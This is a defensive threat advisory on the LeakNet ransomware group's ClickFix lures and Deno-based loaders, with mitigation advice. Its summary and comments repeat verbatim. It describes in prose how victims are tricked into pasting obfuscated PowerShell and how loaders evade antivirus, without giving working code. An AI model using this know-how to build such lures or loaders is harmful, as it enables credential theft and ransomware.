LeakNet Ransomware Uses Clickfix and Deno Runtime for Stealthy Attacks
Summary:
The "ClickFix" technique has rapidly transitioned from a novel social engineering trick into a highly industrialized threat vector. At its core, ClickFix exploits "verification fatigue" by presenting users with fake browser errors, CAPTCHAs, or software update prompts. Unlike traditional malware that relies on a user downloading and double-clicking a file, ClickFix instructs the victim to manually execute malicious code. Typically, the lure provides a "Fix It" button that copies an obfuscated PowerShell command to the user's clipboard and then provides step-by-step instructions to open the Windows Run dialog (Win+R) and paste the command (Ctrl+V). This bypasses many traditional browser security controls and email gateways because the "malicious" action, the execution,is performed by a trusted user through a legitimate system utility.
Recent developments show threat actors scaling this method through the "LeakNet" ecosystem and the adoption of "Deno", a modern, secure runtime for JavaScript and TypeScript as a delivery vehicle. By leveraging Deno, attackers can wrap their malicious scripts in a legitimate-looking, signed executable that is less likely to trigger traditional AV signatures compared to raw PowerShell scripts or older Python-based loaders. This "Casting a Wider Net" approach signifies a shift toward Malware-as-a-Service (MaaS) where lower-tier affiliates can now deploy sophisticated, multi-stage infection chains that deliver infostealers like Lumma, Vidar, or Rhadamanthys with minimal technical effort.
Security Officer Comments:
The surge in ClickFix activity represents a significant shift in the "Initial Access" landscape. The impact of this threat is particularly acute because it weaponizes the very tools, like PowerShell and the Run command, that IT administrators and power users rely on daily. Because the technique relies on user-assisted execution, it effectively nullifies the protection provided by "Mark of the Web" (MotW) and other file-download restrictions that many organizations have spent years hardening.
For organizations within our community, a successful ClickFix infection is rarely the end of the road; it is almost always the precursor to credential theft or ransomware. Once an infostealer is executed via this method, it can harvest session cookies, bypassing Multi-Factor Authentication (MFA) through session hijacking. For organizations, this means that even "secure" accounts are at risk if an employee falls for a fake Google Meet or Zoom error message. Furthermore, the move toward using Deno-based loaders indicates that adversaries are actively seeking ways to circumvent EDR (Endpoint Detection and Response) tools by using "Living-off-the-Runtime" (LotR) techniques, necessitating a shift in focus from file-based detection to behavioral monitoring of system utilities.
Suggested Corrections:
LeakNet is shortening the path from initial access to lateral movement by relying less on IABs and running its own ClickFix lures. The actions below focus on preventing initial access and lateral movement associated with LeakNet.
Link(s):
https://www.bleepingcomputer.com/ne...ickfix-and-deno-runtime-for-stealthy-attacks/
The "ClickFix" technique has rapidly transitioned from a novel social engineering trick into a highly industrialized threat vector. At its core, ClickFix exploits "verification fatigue" by presenting users with fake browser errors, CAPTCHAs, or software update prompts. Unlike traditional malware that relies on a user downloading and double-clicking a file, ClickFix instructs the victim to manually execute malicious code. Typically, the lure provides a "Fix It" button that copies an obfuscated PowerShell command to the user's clipboard and then provides step-by-step instructions to open the Windows Run dialog (Win+R) and paste the command (Ctrl+V). This bypasses many traditional browser security controls and email gateways because the "malicious" action, the execution,is performed by a trusted user through a legitimate system utility.
Recent developments show threat actors scaling this method through the "LeakNet" ecosystem and the adoption of "Deno", a modern, secure runtime for JavaScript and TypeScript as a delivery vehicle. By leveraging Deno, attackers can wrap their malicious scripts in a legitimate-looking, signed executable that is less likely to trigger traditional AV signatures compared to raw PowerShell scripts or older Python-based loaders. This "Casting a Wider Net" approach signifies a shift toward Malware-as-a-Service (MaaS) where lower-tier affiliates can now deploy sophisticated, multi-stage infection chains that deliver infostealers like Lumma, Vidar, or Rhadamanthys with minimal technical effort.
Security Officer Comments:
The surge in ClickFix activity represents a significant shift in the "Initial Access" landscape. The impact of this threat is particularly acute because it weaponizes the very tools, like PowerShell and the Run command, that IT administrators and power users rely on daily. Because the technique relies on user-assisted execution, it effectively nullifies the protection provided by "Mark of the Web" (MotW) and other file-download restrictions that many organizations have spent years hardening.
For organizations within our community, a successful ClickFix infection is rarely the end of the road; it is almost always the precursor to credential theft or ransomware. Once an infostealer is executed via this method, it can harvest session cookies, bypassing Multi-Factor Authentication (MFA) through session hijacking. For organizations, this means that even "secure" accounts are at risk if an employee falls for a fake Google Meet or Zoom error message. Furthermore, the move toward using Deno-based loaders indicates that adversaries are actively seeking ways to circumvent EDR (Endpoint Detection and Response) tools by using "Living-off-the-Runtime" (LotR) techniques, necessitating a shift in focus from file-based detection to behavioral monitoring of system utilities.
Suggested Corrections:
LeakNet is shortening the path from initial access to lateral movement by relying less on IABs and running its own ClickFix lures. The actions below focus on preventing initial access and lateral movement associated with LeakNet.
- Block Newly Registered Domains: C2 domains spun up associated with this campaign are usually only a few weeks old. Newly registered domains are rarely needed for business operations and have a big effect on making it harder for threat actors to spin up new infrastructure.
- Block users from using Win-R: Regular non-technical users should not have access to run Win-R on their Windows Workstation.
- Prevent PSExec from unauthorized users: Regular non-technical users should not have access to run PsExec. Create a Group Policy Object (GPO) to block its use to only allow authorized admins.
Link(s):
https://www.bleepingcomputer.com/ne...ickfix-and-deno-runtime-for-stealthy-attacks/